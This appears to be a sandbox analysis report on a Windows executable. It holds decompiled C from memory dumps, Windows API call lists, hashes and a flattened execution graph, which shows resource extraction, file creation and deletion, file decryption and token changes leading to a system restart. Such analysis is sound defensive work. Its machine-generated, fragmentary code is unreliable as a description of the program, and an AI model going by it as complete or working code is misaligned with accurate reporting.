                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c36e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c36ba
                                                                                                                                                                                                        0x000c36ed

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 000C369F
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000C36B2
                                                                                                                                                                                                        • DispatchMessageA.USER32(?), ref: 000C36CB
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000C36DA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2776232527-0
                                                                                                                                                                                                        • Opcode ID: a9f8cd12f04042cc223c90a117f96f77f6631ddc3637d98e0a358e970334dbf3
                                                                                                                                                                                                        • Instruction ID: 5eeaa5804b10433bf6d5964efe1d0e035a443e8309dcc3fa14acfeb6c8406ed2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9f8cd12f04042cc223c90a117f96f77f6631ddc3637d98e0a358e970334dbf3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2018472A002187BDB304BA65C4CFEF77BCEB86B14F04811DBD05E2280D6648640C6A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                                                        			E000C65E8(char* __ecx) {
                                                                                                                                                                                                        				char _t3;
                                                                                                                                                                                                        				char _t10;
                                                                                                                                                                                                        				char* _t12;
                                                                                                                                                                                                        				char* _t14;
                                                                                                                                                                                                        				char* _t15;
                                                                                                                                                                                                        				CHAR* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t12 = __ecx;
                                                                                                                                                                                                        				_t15 = __ecx;
                                                                                                                                                                                                        				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                        				_t10 = 0;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t3 =  *_t12;
                                                                                                                                                                                                        					_t12 =  &(_t12[1]);
                                                                                                                                                                                                        				} while (_t3 != 0);
                                                                                                                                                                                                        				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                        					if(_t16 <= _t15) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if( *_t16 == 0x5c) {
                                                                                                                                                                                                        						L7:
                                                                                                                                                                                                        						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                        							_t16 = CharNextA(_t16);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *_t16 = _t10;
                                                                                                                                                                                                        						_t10 = 1;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(_t16);
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					return _t10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *_t16 == 0x5c) {
                                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        0x000c65e8
                                                                                                                                                                                                        0x000c65ed
                                                                                                                                                                                                        0x000c65ef
                                                                                                                                                                                                        0x000c65f2
                                                                                                                                                                                                        0x000c65f4
                                                                                                                                                                                                        0x000c65f4
                                                                                                                                                                                                        0x000c65f6
                                                                                                                                                                                                        0x000c65f7
                                                                                                                                                                                                        0x000c6608
                                                                                                                                                                                                        0x000c6611
                                                                                                                                                                                                        0x000c6618
                                                                                                                                                                                                        0x000c661c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c660e
                                                                                                                                                                                                        0x000c6623
                                                                                                                                                                                                        0x000c6625
                                                                                                                                                                                                        0x000c663b
                                                                                                                                                                                                        0x000c663b
                                                                                                                                                                                                        0x000c663d
                                                                                                                                                                                                        0x000c6641
                                                                                                                                                                                                        0x000c6610
                                                                                                                                                                                                        0x000c6610
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c6610
                                                                                                                                                                                                        0x000c6644
                                                                                                                                                                                                        0x000c6647
                                                                                                                                                                                                        0x000c6647
                                                                                                                                                                                                        0x000c6621
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,000C2B33), ref: 000C6602
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 000C6612
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 000C6629
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 000C6635
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Prev$Next
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3260447230-0
                                                                                                                                                                                                        • Opcode ID: ce1b1f552a5f9128b194e5a1adbd74cdd356f392cbc410501a1780569a6180ae
                                                                                                                                                                                                        • Instruction ID: 0cedbb81fbba98d45d27f9b956400b9f3fcb610b872c265d651eb66779ba6488
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce1b1f552a5f9128b194e5a1adbd74cdd356f392cbc410501a1780569a6180ae
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0F0F4321045506EE7321B298C8CEBFBFDCCF87258B2D01AFE89182111D61A0D068662
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:28.7%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                        Total number of Nodes:960
                                                                                                                                                                                                        Total number of Limit Nodes:24
                                                                                                                                                                                                        execution_graph 2196 1f4ad0 2204 1f3680 2196->2204 2199 1f4aee WriteFile 2201 1f4b0f 2199->2201 2202 1f4b14 2199->2202 2200 1f4ae9 2202->2201 2203 1f4b3b SendDlgItemMessageA 2202->2203 2203->2201 2205 1f3691 MsgWaitForMultipleObjects 2204->2205 2206 1f36a9 PeekMessageA 2205->2206 2207 1f36e8 2205->2207 2206->2205 2208 1f36bc 2206->2208 2207->2199 2207->2200 2208->2205 2208->2207 2209 1f36c7 DispatchMessageA 2208->2209 2210 1f36d1 PeekMessageA 2208->2210 2209->2210 2210->2208 2211 1f4cd0 2212 1f4cf4 2211->2212 2213 1f4d0b 2211->2213 2214 1f4d02 2212->2214 2215 1f4b60 FindCloseChangeNotification 2212->2215 2213->2214 2217 1f4dcb 2213->2217 2220 1f4d25 2213->2220 2268 1f6ce0 2214->2268 2215->2214 2218 1f4dd4 SetDlgItemTextA 2217->2218 2221 1f4de3 2217->2221 2218->2221 2219 1f4e95 2220->2214 2234 1f4c37 2220->2234 2221->2214 2242 1f476d 2221->2242 2224 1f4e38 2224->2214 2251 1f4980 2224->2251 2230 1f4e64 2259 1f47e0 LocalAlloc 2230->2259 2233 1f4e6f 2233->2214 2235 1f4c88 2234->2235 2236 1f4c4c DosDateTimeToFileTime 2234->2236 2235->2214 2239 1f4b60 2235->2239 2236->2235 2237 1f4c5e LocalFileTimeToFileTime 2236->2237 2237->2235 2238 1f4c70 SetFileTime 2237->2238 2238->2235 2240 1f4b76 SetFileAttributesA 2239->2240 2241 1f4b92 FindCloseChangeNotification 2239->2241 2240->2214 2241->2240 2273 1f66ae GetFileAttributesA 2242->2273 2244 1f477b 2244->2224 2245 1f47cc SetFileAttributesA 2247 1f47db 2245->2247 2247->2224 2250 1f47c2 2250->2245 2252 1f4990 2251->2252 2253 1f49a5 2252->2253 2254 1f49c2 lstrcmpA 2252->2254 2255 1f44b9 20 API calls 2253->2255 2256 1f4a0e 2254->2256 2257 1f49ba 2254->2257 2255->2257 2256->2257 2339 1f487a 2256->2339 2257->2214 2257->2230 2260 1f480f LocalAlloc 2259->2260 2261 1f47f6 2259->2261 2263 1f480b 2260->2263 2265 1f4831 2260->2265 2262 1f44b9 20 API calls 2261->2262 2262->2263 2263->2233 2266 1f44b9 20 API calls 2265->2266 2267 1f4846 LocalFree 2266->2267 2267->2263 2269 1f6ceb 2268->2269 2270 1f6ce8 2268->2270 2352 1f6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2269->2352 2270->2219 2272 1f6e26 2272->2219 2274 1f4777 2273->2274 2274->2244 2274->2245 2275 1f6517 FindResourceA 2274->2275 2276 1f656b 2275->2276 2277 1f6536 LoadResource 2275->2277 2282 1f44b9 2276->2282 2277->2276 2278 1f6544 DialogBoxIndirectParamA FreeResource 2277->2278 2278->2276 2280 1f47b1 2278->2280 2280->2245 2280->2247 2280->2250 2283 1f44fe LoadStringA 2282->2283 2296 1f455a 2282->2296 2284 1f4527 2283->2284 2288 1f4562 2283->2288 2285 1f681f 10 API calls 2284->2285 2290 1f452c 2285->2290 2286 1f6ce0 4 API calls 2287 1f4689 2286->2287 2287->2280 2291 1f45c9 2288->2291 2298 1f457e 2288->2298 2289 1f4536 MessageBoxA 2289->2296 2290->2289 2323 1f67c9 2290->2323 2293 1f45cd LocalAlloc 2291->2293 2294 1f4607 LocalAlloc 2291->2294 2293->2296 2300 1f45f3 2293->2300 2294->2296 2307 1f45c4 2294->2307 2296->2286 2298->2298 2299 1f4596 LocalAlloc 2298->2299 2299->2296 2302 1f45af 2299->2302 2303 1f171e _vsnprintf 2300->2303 2301 1f462d MessageBeep 2311 1f681f 2301->2311 2329 1f171e 2302->2329 2303->2307 2307->2301 2308 1f4645 MessageBoxA LocalFree 2308->2296 2309 1f67c9 EnumResourceLanguagesA 2309->2308 2312 1f6857 GetVersionExA 2311->2312 2313 1f6940 2311->2313 2314 1f687c 2312->2314 2322 1f691a 2312->2322 2315 1f6ce0 4 API calls 2313->2315 2317 1f68a5 GetSystemMetrics 2314->2317 2314->2322 2316 1f463b 2315->2316 2316->2308 2316->2309 2318 1f68b5 RegOpenKeyExA 2317->2318 2317->2322 2319 1f68d6 RegQueryValueExA RegCloseKey 2318->2319 2318->2322 2320 1f690c 2319->2320 2319->2322 2333 1f66f9 2320->2333 2322->2313 2324 1f6803 2323->2324 2325 1f67e2 2323->2325 2324->2289 2337 1f6793 EnumResourceLanguagesA 2325->2337 2327 1f67f5 2327->2324 2338 1f6793 EnumResourceLanguagesA 2327->2338 2330 1f172d 2329->2330 2331 1f173d _vsnprintf 2330->2331 2332 1f175d 2330->2332 2331->2332 2332->2307 2336 1f670f 2333->2336 2334 1f6740 CharNextA 2334->2336 2335 1f674b 2335->2322 2336->2334 2336->2335 2337->2327 2338->2324 2340 1f48a2 CreateFileA 2339->2340 2342 1f48e9 2340->2342 2343 1f4908 2340->2343 2342->2343 2344 1f48ee 2342->2344 2343->2257 2347 1f490c 2344->2347 2348 1f48f5 CreateFileA 2347->2348 2349 1f4917 2347->2349 2348->2343 2349->2348 2350 1f4962 CharNextA 2349->2350 2351 1f4953 CreateDirectoryA 2349->2351 2350->2349 2351->2350 2352->2272 3119 1f3210 3120 1f328e EndDialog 3119->3120 3121 1f3227 3119->3121 3136 1f3239 3120->3136 3122 1f3235 3121->3122 3123 1f33e2 GetDesktopWindow 3121->3123 3127 1f32dd GetDlgItemTextA 3122->3127 3128 1f324c 3122->3128 3122->3136 3172 1f43d0 6 API calls 3123->3172 3137 1f32fc 3127->3137 3152 1f3366 3127->3152 3130 1f32c5 EndDialog 3128->3130 3131 1f3251 3128->3131 3129 1f341f GetDlgItem EnableWindow 3129->3136 3130->3136 3132 1f325c LoadStringA 3131->3132 3131->3136 3133 1f327b 3132->3133 3134 1f3294 3132->3134 3140 1f44b9 20 API calls 3133->3140 3157 1f4224 LoadLibraryA 3134->3157 3135 1f44b9 20 API calls 3135->3136 3139 1f3331 GetFileAttributesA 3137->3139 3137->3152 3142 1f333f 3139->3142 3143 1f337c 3139->3143 3140->3120 3146 1f44b9 20 API calls 3142->3146 3145 1f658a CharPrevA 3143->3145 3144 1f32a5 SetDlgItemTextA 3144->3133 3144->3136 3147 1f338d 3145->3147 3148 1f3351 3146->3148 3149 1f58c8 27 API calls 3147->3149 3148->3136 3150 1f335a CreateDirectoryA 3148->3150 3151 1f3394 3149->3151 3150->3143 3150->3152 3151->3152 3153 1f33a4 3151->3153 3152->3135 3154 1f33c7 EndDialog 3153->3154 3155 1f597d 34 API calls 3153->3155 3154->3136 3156 1f33c3 3155->3156 3156->3136 3156->3154 3158 1f4246 GetProcAddress 3157->3158 3159 1f43b2 3157->3159 3160 1f425d GetProcAddress 3158->3160 3161 1f43a4 FreeLibrary 3158->3161 3163 1f44b9 20 API calls 3159->3163 3160->3161 3162 1f4274 GetProcAddress 3160->3162 3161->3159 3162->3161 3164 1f428b 3162->3164 3165 1f329d 3163->3165 3166 1f4295 GetTempPathA 3164->3166 3171 1f42e1 3164->3171 3165->3136 3165->3144 3167 1f42ad 3166->3167 3167->3167 3168 1f42b4 CharPrevA 3167->3168 3169 1f42d0 CharPrevA 3168->3169 3168->3171 3169->3171 3170 1f4390 FreeLibrary 3170->3165 3171->3170 3174 1f4463 SetWindowPos 3172->3174 3175 1f6ce0 4 API calls 3174->3175 3176 1f33f1 SetWindowTextA SendDlgItemMessageA 3175->3176 3176->3129 3176->3136 3177 1f4a50 3178 1f4a9f ReadFile 3177->3178 3179 1f4a66 3177->3179 3180 1f4abb 3178->3180 3179->3180 3181 1f4a82 memcpy 3179->3181 3181->3180 3182 1f3450 3183 1f345e 3182->3183 3184 1f34d3 EndDialog 3182->3184 3185 1f349a GetDesktopWindow 3183->3185 3189 1f3465 3183->3189 3186 1f346a 3184->3186 3187 1f43d0 11 API calls 3185->3187 3188 1f34ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3187->3188 3188->3186 3189->3186 3190 1f348c EndDialog 3189->3190 3190->3186 3191 1f6c03 3192 1f6c1e 3191->3192 3193 1f6c17 _exit 3191->3193 3194 1f6c27 _cexit 3192->3194 3195 1f6c32 3192->3195 3193->3192 3194->3195 2353 1f6f40 SetUnhandledExceptionFilter 2354 1f4cc0 GlobalFree 3196 1f4200 3197 1f421e 3196->3197 3198 1f420b SendMessageA 3196->3198 3198->3197 3199 1f3100 3200 1f31b0 3199->3200 3201 1f3111 3199->3201 3202 1f3141 3200->3202 3203 1f31b9 SendDlgItemMessageA 3200->3203 3204 1f311d 3201->3204 3205 1f3149 GetDesktopWindow 3201->3205 3203->3202 3204->3202 3206 1f3138 EndDialog 3204->3206 3207 1f43d0 11 API calls 3205->3207 3206->3202 3208 1f315d 6 API calls 3207->3208 3208->3202 3209 1f4bc0 3211 1f4c05 3209->3211 3212 1f4bd7 3209->3212 3210 1f4c1b SetFilePointer 3210->3212 3211->3210 3211->3212 3213 1f30c0 3214 1f30de CallWindowProcA 3213->3214 3215 1f30ce 3213->3215 3216 1f30da 3214->3216 3215->3214 3215->3216 3217 1f63c0 3218 1f6407 3217->3218 3219 1f658a CharPrevA 3218->3219 3220 1f6415 CreateFileA 3219->3220 3221 1f643a 3220->3221 3222 1f6448 WriteFile 3220->3222 3225 1f6ce0 4 API calls 3221->3225 3223 1f6465 CloseHandle 3222->3223 3223->3221 3226 1f648f 3225->3226 3227 1f7270 _except_handler4_common 3228 1f69b0 3229 1f69b5 3228->3229 3237 1f6fbe GetModuleHandleW 3229->3237 3231 1f69c1 __set_app_type __p__fmode __p__commode 3232 1f69f9 3231->3232 3233 1f6a0e 3232->3233 3234 1f6a02 __setusermatherr 3232->3234 3239 1f71ef _controlfp 3233->3239 3234->3233 3236 1f6a13 3238 1f6fcf 3237->3238 3238->3231 3239->3236 3240 1f34f0 3241 1f3504 3240->3241 3259 1f35b8 3240->3259 3242 1f35be GetDesktopWindow 3241->3242 3243 1f351b 3241->3243 3241->3259 3245 1f43d0 11 API calls 3242->3245 3246 1f354f 3243->3246 3247 1f351f 3243->3247 3244 1f3526 3249 1f35d6 3245->3249 3246->3244 3251 1f3559 ResetEvent 3246->3251 3247->3244 3250 1f352d TerminateThread EndDialog 3247->3250 3248 1f3671 EndDialog 3248->3244 3252 1f361d SetWindowTextA CreateThread 3249->3252 3253 1f35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3249->3253 3250->3244 3254 1f44b9 20 API calls 3251->3254 3252->3244 3255 1f3646 3252->3255 3253->3252 3256 1f3581 3254->3256 3257 1f44b9 20 API calls 3255->3257 3258 1f359b SetEvent 3256->3258 3260 1f358a SetEvent 3256->3260 3257->3259 3261 1f3680 4 API calls 3258->3261 3259->3244 3259->3248 3260->3244 3261->3259 3262 1f6ef0 3263 1f6f2d 3262->3263 3265 1f6f02 3262->3265 3264 1f6f27 ?terminate@ 3264->3263 3265->3263 3265->3264 3266 1f6bef _XcptFilter 2355 1f4ca0 GlobalAlloc 2356 1f6a60 2373 1f7155 2356->2373 2358 1f6a65 2359 1f6a76 GetStartupInfoW 2358->2359 2360 1f6a93 2359->2360 2361 1f6aa8 2360->2361 2362 1f6aaf Sleep 2360->2362 2363 1f6ac7 _amsg_exit 2361->2363 2365 1f6ad1 2361->2365 2362->2360 2363->2365 2364 1f6b13 _initterm 2369 1f6b2e __IsNonwritableInCurrentImage 2364->2369 2365->2364 2367 1f6af4 2365->2367 2365->2369 2366 1f6bd6 _ismbblead 2366->2369 2368 1f6c1e 2368->2367 2370 1f6c27 _cexit 2368->2370 2369->2366 2369->2368 2372 1f6bbe exit 2369->2372 2378 1f2bfb GetVersion 2369->2378 2370->2367 2372->2369 2374 1f717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2373->2374 2375 1f717a 2373->2375 2377 1f71cd 2374->2377 2375->2374 2376 1f71e2 2375->2376 2376->2358 2377->2376 2379 1f2c0f 2378->2379 2380 1f2c50 2378->2380 2379->2380 2382 1f2c13 GetModuleHandleW 2379->2382 2395 1f2caa memset memset memset 2380->2395 2382->2380 2383 1f2c22 GetProcAddress 2382->2383 2383->2380 2392 1f2c34 2383->2392 2385 1f2c8e 2386 1f2c9e 2385->2386 2387 1f2c97 CloseHandle 2385->2387 2386->2369 2387->2386 2392->2380 2393 1f2c89 2489 1f1f90 2393->2489 2506 1f468f FindResourceA SizeofResource 2395->2506 2398 1f2ef3 2401 1f44b9 20 API calls 2398->2401 2399 1f2d2d CreateEventA SetEvent 2400 1f468f 7 API calls 2399->2400 2402 1f2d57 2400->2402 2403 1f2d6e 2401->2403 2404 1f2d5b 2402->2404 2406 1f2e1f 2402->2406 2409 1f468f 7 API calls 2402->2409 2407 1f6ce0 4 API calls 2403->2407 2405 1f44b9 20 API calls 2404->2405 2405->2403 2511 1f5c9e 2406->2511 2410 1f2c62 2407->2410 2412 1f2d9f 2409->2412 2410->2385 2436 1f2f1d 2410->2436 2412->2404 2415 1f2da3 CreateMutexA 2412->2415 2413 1f2e3a 2417 1f2e43 2413->2417 2418 1f2e52 FindResourceA 2413->2418 2414 1f2e30 2414->2398 2415->2406 2416 1f2dbd GetLastError 2415->2416 2416->2406 2419 1f2dca 2416->2419 2537 1f2390 2417->2537 2420 1f2e6e 2418->2420 2421 1f2e64 LoadResource 2418->2421 2424 1f2dea 2419->2424 2425 1f2dd5 2419->2425 2423 1f2e4d 2420->2423 2552 1f36ee GetVersionExA 2420->2552 2421->2420 2423->2403 2427 1f44b9 20 API calls 2424->2427 2426 1f44b9 20 API calls 2425->2426 2428 1f2de8 2426->2428 2429 1f2dff 2427->2429 2431 1f2e04 CloseHandle 2428->2431 2429->2406 2429->2431 2431->2403 2435 1f6517 24 API calls 2435->2423 2437 1f2f3f 2436->2437 2438 1f2f6c 2436->2438 2440 1f2f5f 2437->2440 2641 1f51e5 2437->2641 2660 1f5164 2438->2660 2788 1f3a3f 2440->2788 2442 1f2f71 2472 1f303c 2442->2472 2673 1f55a0 2442->2673 2448 1f6ce0 4 API calls 2450 1f2c6b 2448->2450 2449 1f2f86 GetSystemDirectoryA 2451 1f658a CharPrevA 2449->2451 2476 1f52b6 2450->2476 2452 1f2fab LoadLibraryA 2451->2452 2453 1f2ff7 FreeLibrary 2452->2453 2454 1f2fc0 GetProcAddress 2452->2454 2455 1f3017 SetCurrentDirectoryA 2453->2455 2456 1f3006 2453->2456 2454->2453 2457 1f2fd6 DecryptFileA 2454->2457 2458 1f3026 2455->2458 2459 1f3054 2455->2459 2456->2455 2721 1f621e GetWindowsDirectoryA 2456->2721 2457->2453 2464 1f2ff0 2457->2464 2462 1f44b9 20 API calls 2458->2462 2460 1f3061 2459->2460 2731 1f3b26 2459->2731 2466 1f307a 2460->2466 2460->2472 2740 1f256d 2460->2740 2468 1f3037 2462->2468 2464->2453 2470 1f3098 2466->2470 2751 1f3ba2 2466->2751 2807 1f6285 GetLastError 2468->2807 2470->2472 2473 1f30af 2470->2473 2472->2448 2809 1f4169 2473->2809 2477 1f52d6 2476->2477 2486 1f5316 2476->2486 2480 1f5300 LocalFree LocalFree 2477->2480 2482 1f52eb SetFileAttributesA DeleteFileA 2477->2482 2478 1f5374 2479 1f538c 2478->2479 3115 1f1fe1 2478->3115 2481 1f6ce0 4 API calls 2479->2481 2480->2477 2480->2486 2483 1f2c72 2481->2483 2482->2480 2483->2385 2483->2393 2485 1f535e SetCurrentDirectoryA 2488 1f2390 13 API calls 2485->2488 2486->2478 2486->2485 2487 1f65e8 4 API calls 2486->2487 2487->2485 2488->2478 2490 1f1f9a 2489->2490 2492 1f1f9f 2489->2492 2491 1f1ea7 15 API calls 2490->2491 2491->2492 2493 1f1fc0 2492->2493 2494 1f44b9 20 API calls 2492->2494 2497 1f1fd9 2492->2497 2495 1f1fcf ExitWindowsEx 2493->2495 2496 1f1ee2 GetCurrentProcess OpenProcessToken 2493->2496 2493->2497 2494->2493 2495->2497 2499 1f1f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2496->2499 2501 1f1f0e 2496->2501 2497->2385 2500 1f1f6b ExitWindowsEx 2499->2500 2499->2501 2500->2501 2502 1f1f1f 2500->2502 2503 1f44b9 20 API calls 2501->2503 2504 1f6ce0 4 API calls 2502->2504 2503->2502 2505 1f1f8c 2504->2505 2505->2385 2507 1f2d1a 2506->2507 2508 1f46b6 2506->2508 2507->2398 2507->2399 2508->2507 2509 1f46be FindResourceA LoadResource LockResource 2508->2509 2509->2507 2510 1f46df memcpy_s FreeResource 2509->2510 2510->2507 2512 1f5e17 2511->2512 2535 1f5cc3 2511->2535 2514 1f6ce0 4 API calls 2512->2514 2513 1f5dd0 2513->2512 2517 1f5dec GetModuleFileNameA 2513->2517 2516 1f2e2c 2514->2516 2515 1f5ced CharNextA 2515->2535 2516->2413 2516->2414 2517->2512 2518 1f5e0a 2517->2518 2587 1f66c8 2518->2587 2520 1f6218 2596 1f6e2a 2520->2596 2523 1f5e36 CharUpperA 2524 1f61d0 2523->2524 2523->2535 2525 1f44b9 20 API calls 2524->2525 2526 1f61e7 2525->2526 2527 1f61f7 ExitProcess 2526->2527 2528 1f61f0 CloseHandle 2526->2528 2528->2527 2529 1f5f9f CharUpperA 2529->2535 2530 1f5f59 CompareStringA 2530->2535 2531 1f6003 CharUpperA 2531->2535 2532 1f5edc CharUpperA 2532->2535 2533 1f60a2 CharUpperA 2533->2535 2534 1f667f IsDBCSLeadByte CharNextA 2534->2535 2535->2512 2535->2513 2535->2515 2535->2520 2535->2523 2535->2529 2535->2530 2535->2531 2535->2532 2535->2533 2535->2534 2592 1f658a 2535->2592 2538 1f24cb 2537->2538 2541 1f23b9 2537->2541 2539 1f6ce0 4 API calls 2538->2539 2540 1f24dc 2539->2540 2540->2423 2541->2538 2542 1f23e9 FindFirstFileA 2541->2542 2542->2538 2550 1f2407 2542->2550 2543 1f2479 2548 1f2488 SetFileAttributesA DeleteFileA 2543->2548 2544 1f2421 lstrcmpA 2545 1f24a9 FindNextFileA 2544->2545 2546 1f2431 lstrcmpA 2544->2546 2547 1f24bd FindClose RemoveDirectoryA 2545->2547 2545->2550 2546->2545 2546->2550 2547->2538 2548->2545 2549 1f658a CharPrevA 2549->2550 2550->2543 2550->2544 2550->2545 2550->2549 2551 1f2390 5 API calls 2550->2551 2551->2550 2556 1f3737 2552->2556 2558 1f372d 2552->2558 2553 1f44b9 20 API calls 2566 1f39fc 2553->2566 2554 1f6ce0 4 API calls 2555 1f2e92 2554->2555 2555->2403 2555->2423 2567 1f18a3 2555->2567 2556->2558 2559 1f38a4 2556->2559 2556->2566 2603 1f28e8 2556->2603 2558->2553 2558->2566 2559->2558 2560 1f39c1 MessageBeep 2559->2560 2559->2566 2561 1f681f 10 API calls 2560->2561 2562 1f39ce 2561->2562 2563 1f39d8 MessageBoxA 2562->2563 2565 1f67c9 EnumResourceLanguagesA 2562->2565 2563->2566 2565->2563 2566->2554 2568 1f19b8 2567->2568 2569 1f18d5 2567->2569 2571 1f6ce0 4 API calls 2568->2571 2632 1f17ee LoadLibraryA 2569->2632 2573 1f19d5 2571->2573 2573->2423 2573->2435 2574 1f18e5 GetCurrentProcess OpenProcessToken 2574->2568 2575 1f1900 GetTokenInformation 2574->2575 2576 1f19aa CloseHandle 2575->2576 2577 1f1918 GetLastError 2575->2577 2576->2568 2577->2576 2578 1f1927 LocalAlloc 2577->2578 2579 1f19a9 2578->2579 2580 1f1938 GetTokenInformation 2578->2580 2579->2576 2581 1f194e AllocateAndInitializeSid 2580->2581 2582 1f19a2 LocalFree 2580->2582 2581->2582 2586 1f196e 2581->2586 2582->2579 2583 1f1999 FreeSid 2583->2582 2584 1f1975 EqualSid 2585 1f198c 2584->2585 2584->2586 2585->2583 2586->2583 2586->2584 2586->2585 2588 1f66d5 2587->2588 2589 1f66f3 2588->2589 2591 1f66e5 CharNextA 2588->2591 2599 1f6648 2588->2599 2589->2512 2591->2588 2593 1f659b 2592->2593 2593->2593 2594 1f65b8 CharPrevA 2593->2594 2595 1f65ab 2593->2595 2594->2595 2595->2535 2602 1f6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 1f621d 2600 1f665d IsDBCSLeadByte 2599->2600 2601 1f6668 2599->2601 2600->2601 2601->2588 2602->2598 2604 1f2a62 2603->2604 2611 1f290d 2603->2611 2605 1f2a6e GlobalFree 2604->2605 2606 1f2a75 2604->2606 2605->2606 2606->2559 2608 1f2955 GlobalAlloc 2608->2604 2609 1f2968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 1f2a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 1f2a80 GlobalUnlock 2611->2612 2613 1f2773 2611->2613 2612->2604 2614 1f27a3 CharUpperA CharNextA CharNextA 2613->2614 2615 1f28b2 2613->2615 2616 1f27db 2614->2616 2617 1f28b7 GetSystemDirectoryA 2614->2617 2615->2617 2618 1f28a8 GetWindowsDirectoryA 2616->2618 2620 1f27e3 2616->2620 2619 1f28bf 2617->2619 2618->2619 2621 1f28d2 2619->2621 2622 1f658a CharPrevA 2619->2622 2624 1f658a CharPrevA 2620->2624 2623 1f6ce0 4 API calls 2621->2623 2622->2621 2625 1f28e2 2623->2625 2626 1f2810 RegOpenKeyExA 2624->2626 2625->2611 2626->2619 2627 1f2837 RegQueryValueExA 2626->2627 2628 1f285c 2627->2628 2629 1f289a RegCloseKey 2627->2629 2630 1f2867 ExpandEnvironmentStringsA 2628->2630 2631 1f287a 2628->2631 2629->2619 2630->2631 2631->2629 2633 1f1826 GetProcAddress 2632->2633 2634 1f1890 2632->2634 2635 1f1889 FreeLibrary 2633->2635 2636 1f1839 AllocateAndInitializeSid 